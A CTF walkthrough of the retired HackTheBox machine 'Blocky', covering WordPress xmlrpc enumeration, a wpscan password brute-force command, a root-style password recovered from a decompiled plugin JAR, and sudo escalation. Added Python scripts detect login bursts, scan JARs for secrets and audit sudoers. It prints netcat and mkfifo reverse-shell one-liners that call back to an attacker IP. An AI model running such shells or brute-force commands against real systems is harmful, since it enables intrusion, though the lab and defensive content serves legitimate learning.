
HacktheBox - Blocky - Retired - Update



Recon

I'm using threader3000 for my recon scan. It first does an up/down scan on all TCP ports, then suggests an nmap scan based on those results. It automatically saves the nmap output to an XML file for you.



I then convert the XML to HTML to make it easier to read.


xsltproc ./blocky.htb/blocky.htb.xml -o blocky.html







So it looks like a Linux box.


4 ports are open:


Port 21     FTP         ProFTPD 1.3.5

Port 22     SSH         OpenSSH 7.2p2

Port 80     HTTP        Apache 2.4.18

Port 25565  Minecraft   1.11.2


Interesting seeing Minecraft on there… let's start with our normal enumeration.


Port 21: let's see if it allows anonymous connections.



Nope.


We'll skip over SSH for right now; that usually is not the path on a HacktheBox machine.


What is it serving on port 80?





Scrolling down we see a link that says login.


Don't mind if we do. Let's check it out.


A WordPress login portal...


Poking around in the source code we see a couple of bits of info that might come in handy:


WordPress 4.8, and the name of the theme being used, "twentyseventeen".



Googling around for WordPress 4.8 exploits I came across this blog:


https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32


It talks about exploiting the xmlrpc.php API.


First, let's make sure the API is exposed.






It looks like it is. In the blog they use Burp Suite to capture this request, change it to POST, and get a list of the methods this site exposes. So we will try that now.


Here is what our captured request looks like loaded up in Repeater.


If we fire that over to Blocky,


we get this as a response, which is exactly what we saw in Firefox.




So if we change it to POST instead of GET:



It accepts the request (we get a 200), but it doesn't know what we want it to do since we didn't ask it to do anything. The blog we found says that inserting this into the body will get back the list of methods:



<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>


So now our request looks like this.


And we get this back from the server







Here is a cleaned-up version of the methods allowed:


system.multicall
system.listMethods
system.getCapabilities
demo.addTwoNumbers
demo.sayHello
pingback.extensions.getPingbacks
pingback.ping
mt.publishPost
mt.getTrackbackPings
mt.supportedTextFilters
mt.supportedMethods
mt.setPostCategories
mt.getPostCategories
mt.getRecentPostTitles
mt.getCategoryList
metaWeblog.getUsersBlogs
metaWeblog.deletePost
metaWeblog.newMediaObject
metaWeblog.getCategories
metaWeblog.getRecentPosts
metaWeblog.getPost
metaWeblog.editPost
metaWeblog.newPost
blogger.deletePost
blogger.editPost
blogger.newPost
blogger.getRecentPosts
blogger.getPost
blogger.getUserInfo
blogger.getUsersBlogs
wp.restoreRevision
wp.getRevisions
wp.getPostTypes
wp.getPostType
wp.getPostFormats
wp.getMediaLibrary
wp.getMediaItem
wp.getCommentStatusList
wp.newComment
wp.editComment
wp.deleteComment
wp.getComments
wp.getComment
wp.setOptions
wp.getOptions
wp.getPageTemplates
wp.getPageStatusList
wp.getPostStatusList
wp.getCommentCount
wp.deleteFile
wp.uploadFile
wp.suggestCategories
wp.deleteCategory
wp.newCategory
wp.getTags
wp.getCategories
wp.getAuthors
wp.getPageList
wp.editPage
wp.deletePage
wp.newPage
wp.getPages
wp.getPage
wp.editProfile
wp.getProfile
wp.getUsers
wp.getUser
wp.getTaxonomies
wp.getTaxonomy
wp.getTerms
wp.getTerm
wp.deleteTerm
wp.editTerm
wp.newTerm
wp.getPosts
wp.getPost
wp.deletePost
wp.editPost
wp.newPost
wp.getUsersBlogs




That is a lot of things we could potentially use this API to do.





Googling around a bit more I stumbled upon a tool named wpscan, which comes with Kali.


Running it with its defaults does show some interesting results.


It shows the xmlrpc exploits we found earlier, but I also found that you can try to enumerate users using


--enumerate u



Looks like the username is notch.


Which we would have found earlier if we had been paying closer attention.






You can also use wpscan to brute-force users' passwords.



wpscan --url http://blocky.htb --passwords /usr/share/wordlists/rockyou.txt --usernames notch -t 100


I just left this running in the background.
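Both the xmlrpc.php probing above and a wpscan password run are loud in the web server's access log, which is where a defender catches them. The script below is an added example for this writeup (not the author's code and not part of wpscan): it parses Apache-style access-log lines and flags any source that POSTs to xmlrpc.php or wp-login.php more than a threshold number of times inside a sliding time window. The sample log lines are constructed, using documentation IP ranges.

```python
"""Detect WordPress login / XML-RPC brute-force bursts in Apache access logs.
Added example for this writeup, not the author's code or wpscan's. SAMPLE_LOG
is constructed; the IPs are documentation addresses."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache common/combined prefix: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Endpoints a wordlist attack hits: xmlrpc.php (system.multicall / wp.getUsersBlogs)
# and the normal login form.
WATCHED = ("/xmlrpc.php", "/wp-login.php")


def parse_line(line: str):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_bursts(lines, threshold: int = 20, window: timedelta = timedelta(seconds=60)):
    """Return {(ip, path): peak_count} for every source that POSTs to a watched
    endpoint at least `threshold` times inside some sliding `window`.
    One login attempt is one POST; a wordlist run produces dozens per second,
    so the count inside a short window separates it from a user who mistyped
    a password a few times."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        path = rec["path"].split("?", 1)[0]          # drop any query string
        if path.endswith(WATCHED):
            events[(rec["ip"], path)].append(rec["ts"])

    alerts = {}
    for key, stamps in events.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:       # shrink the window from the left
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts


# --- constructed sample log ---------------------------------------------------
def _line(ip, method, path, status, ts):
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" {status} 512'


_T0 = datetime(2021, 5, 1, 12, 0, 0, tzinfo=timezone.utc)
SAMPLE_LOG = (
    # 30 password guesses through xmlrpc.php in 30 seconds from one source
    [_line("198.51.100.23", "POST", "/xmlrpc.php", 200, _T0 + timedelta(seconds=i))
     for i in range(30)]
    # normal traffic: a page view, one failed login, a theme stylesheet
    + [_line("192.0.2.7", "GET", "/", 200, _T0 + timedelta(seconds=5)),
       _line("192.0.2.7", "POST", "/wp-login.php", 200, _T0 + timedelta(seconds=9)),
       _line("192.0.2.7", "GET", "/wp-content/themes/twentyseventeen/style.css", 200,
             _T0 + timedelta(seconds=6))]
)

if __name__ == "__main__":
    for (ip, path), n in find_bursts(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {n} POSTs to {path} inside 60s")
```

Run it as-is to see the alert for the constructed burst, or feed `find_bursts` real lines from access.log. If a site does not need XML-RPC at all, WordPress can switch it off with the `xmlrpc_enabled` filter (`add_filter('xmlrpc_enabled', '__return_false');` in a plugin or theme), which also removes the system.multicall method that lets many login attempts ride in one request.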



Exploit


While running dirb against Blocky it came back with an interesting folder:



http://blocky.htb/plugins/


which included this BlockyCore.jar file. I downloaded a copy of it to my Kali box.


Nothing I could find built into Kali would open this file, so I googled around and found a tool named jd-gui.


I used apt-get to install it:


sudo apt-get install jd-gui




Then I opened it with jd-gui and was kind of dumbstruck to see this.



Is that really the root password??



8YsqfCTnvxAUeduzjNSXe22
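A credential baked into a plugin JAR is exactly what a build-time secret scan over the shipped artifact should catch. The script below is an added example for this writeup (not the author's code, and not how jd-gui works): it parses the constant pool of each .class file inside a JAR, which is where javac stores every string literal, and flags long, high-entropy literals for review. The sample class and JAR are constructed in memory; BlockyCore as a class name, the sqlPass field name and the com/example path are assumptions, and the credential-like string is made up.

```python
"""Scan a JAR for string literals that look like hardcoded credentials by parsing
each class file's constant pool, which is where javac stores every literal.
Added example for this writeup (not the author's code, not what jd-gui does).
SAMPLE_CLASS is a constructed class file holding only a constant pool; the
class and field names in it are hypothetical."""
import io
import math
import struct
import zipfile
from collections import Counter

# Byte width of fixed-size constant-pool entries by tag. Tag 1 (Utf8) is
# variable-length; tags 5/6 (Long/Double) occupy two pool slots.
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
          15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def constant_pool(data: bytes) -> dict:
    """Map pool index -> str for Utf8 entries, else ("String", utf8_index) or ("other", tag)."""
    magic, _minor, _major, count = struct.unpack_from(">IHHH", data, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    pool, off, i = {}, 10, 1
    while i < count:
        tag = data[off]
        off += 1
        if tag == 1:                                   # CONSTANT_Utf8: u2 length + bytes
            (length,) = struct.unpack_from(">H", data, off)
            off += 2
            pool[i] = data[off:off + length].decode("utf-8", "replace")
            off += length
        elif tag == 8:                                 # CONSTANT_String: u2 index of a Utf8
            (idx,) = struct.unpack_from(">H", data, off)
            pool[i] = ("String", idx)
            off += 2
        elif tag in _FIXED:
            pool[i] = ("other", tag)
            off += _FIXED[tag]
        else:
            raise ValueError(f"unknown constant-pool tag {tag} at offset {off - 1}")
        i += 2 if tag in (5, 6) else 1
    return pool


def string_literals(data: bytes) -> list:
    """Every literal referenced through a CONSTANT_String entry, in pool order."""
    pool = constant_pool(data)
    return [pool[e[1]] for e in pool.values()
            if isinstance(e, tuple) and e[0] == "String" and isinstance(pool.get(e[1]), str)]


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def suspicious_literals(data: bytes, min_len: int = 12, min_entropy: float = 3.5) -> list:
    """Heuristic: long, space-free, high-entropy literals deserve a human look.
    URLs and paths can trip this too, so hits are leads, not verdicts."""
    return [s for s in string_literals(data)
            if len(s) >= min_len and " " not in s and shannon_entropy(s) >= min_entropy]


def scan_jar(jar_bytes: bytes) -> dict:
    """{path of class inside the jar: [suspicious literals]}; classes without hits are omitted."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith(".class"):
                hits = suspicious_literals(zf.read(name))
                if hits:
                    findings[name] = hits
    return findings


# Constructed sample: class-file header plus a constant pool, nothing else.
def _utf8(s):          # CONSTANT_Utf8 entry
    return b"\x01" + struct.pack(">H", len(s.encode())) + s.encode()

def _string(i):        # CONSTANT_String entry pointing at Utf8 entry i
    return b"\x08" + struct.pack(">H", i)

_ENTRIES = [
    _utf8("BlockyCore"),                  # 1  hypothetical class name
    b"\x07" + struct.pack(">H", 1),       # 2  CONSTANT_Class -> #1
    _utf8("sqlPass"),                     # 3  hypothetical field name
    _utf8("EXAMPLE-s3cr3t-Kz9Qw4Lm"),     # 4  constructed credential-like literal
    _string(4),                           # 5
    _utf8("localhost"),                   # 6  too short to flag
    _string(6),                           # 7
    _utf8("Hello from the plugin"),       # 8  has spaces, not flagged
    _string(8),                           # 9
    b"\x05" + struct.pack(">q", 42),      # 10 CONSTANT_Long, occupies slots 10 and 11
]
SAMPLE_CLASS = struct.pack(">IHHH", 0xCAFEBABE, 0, 52, 12) + b"".join(_ENTRIES)


def build_sample_jar() -> bytes:
    """A minimal in-memory JAR (a zip) wrapping the sample class at a hypothetical path."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("com/example/BlockyCore.class", SAMPLE_CLASS)
    return buf.getvalue()
```

Pointing `scan_jar` at the bytes of a real JAR from a build pipeline is a cheap gate before an artifact is published; the right fix for a hit is moving the value into configuration or a secrets store and rotating it, since anything in the JAR is readable by whoever can download it.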


One way to find out is SSH, which this box has. I tried logging in as root with the password.



Nope… but what about that other username we found, notch?


We have our foothold.


And we can get our user flag now.


Let's work on escalating to root now.



When I first get a user account with credentials on a Linux box, the first thing I always check is their sudo rights.



OMG, notch can run anything as root.


Should be pretty easy to get our root flag then:


sudo cat /root/root.txt


But wouldn't we really rather have a root shell?


Netcat should make this trivial.


First let's set up our listener:


nc -lnvp 5555


Then we just use netcat to connect back:

sudo nc 10.10.14.19 5566 -e /bin/bash




No -e option. So much for being super easy.


Next I tried mkfifo to get my shell:


sudo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 5555 >/tmp/f



But when it connected back it was still as notch, because sudo only applied to the rm at the front of that line; everything after the first semicolon ran as notch.


Dang…


Wait, are we overthinking this? Can't we just su to root?


sudo su root
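The whole escalation came down to one sudoers rule granting notch everything as root, which a least-privilege review of /etc/sudoers would flag long before anyone had a foothold. The script below is an added example for this writeup, not the author's code: it parses sudoers-format user specs from constructed text (not the box's real file) and rates rules that grant unrestricted root or passwordless root commands.

```python
"""Audit sudoers-format text for rules that hand a user unrestricted root.
Added example for this writeup, not the author's code. SAMPLE_SUDOERS is a
constructed file, not the box's real /etc/sudoers."""
import re

SAMPLE_SUDOERS = """\
# constructed sample
Defaults        env_reset
root     ALL=(ALL:ALL) ALL
%admin   ALL=(ALL) ALL
notch    ALL=(ALL) ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
www-data ALL=(ALL) NOPASSWD: /bin/systemctl   # trailing comment
deploy   ALL=(deploy) /usr/local/bin/deploy.sh
"""

# user host = (runas) [TAG: ...] command list   (Defaults and alias lines are ignored)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)
_SKIP = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")


def _split_tags(cmds: str):
    """Peel leading tags such as NOPASSWD: or SETENV: off the command list."""
    tags, rest = [], cmds.split()
    while rest and rest[0].endswith(":") and rest[0][:-1].isupper():
        tags.append(rest.pop(0)[:-1])
    return tags, " ".join(rest)


def parse_sudoers(text: str) -> list:
    """Parse user-spec lines into dicts; comments, blanks, Defaults and aliases are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.split()[0] in _SKIP:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags, command = _split_tags(m.group("cmds"))
        runas = m.group("runas") or "root"            # sudo's default target user
        rules.append({"user": m.group("user"), "host": m.group("host"),
                      "runas_user": runas.split(":")[0],   # user part of (user:group)
                      "tags": tags, "command": command, "raw": line})
    return rules


def audit(text: str) -> list:
    """Return (user, severity, reason) tuples for rules worth tightening."""
    findings = []
    for r in parse_sudoers(text):
        if r["user"] == "root":
            continue                                  # root is already root
        as_root = r["runas_user"] in ("ALL", "root")
        if as_root and r["command"] == "ALL":
            findings.append((r["user"], "HIGH", "unrestricted root: " + r["raw"]))
        elif as_root and "NOPASSWD" in r["tags"]:
            findings.append((r["user"], "MEDIUM",
                             "passwordless root command: " + r["command"]))
    return findings


if __name__ == "__main__":
    for user, sev, why in audit(SAMPLE_SUDOERS):
        print(f"[{sev}] {user}: {why}")
```

On a real host, feed it the concatenation of /etc/sudoers and /etc/sudoers.d/* (as root, or compare against `sudo -l` output for one account). A HIGH finding for an application or service account is the same condition this box had: one leaked password away from root.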








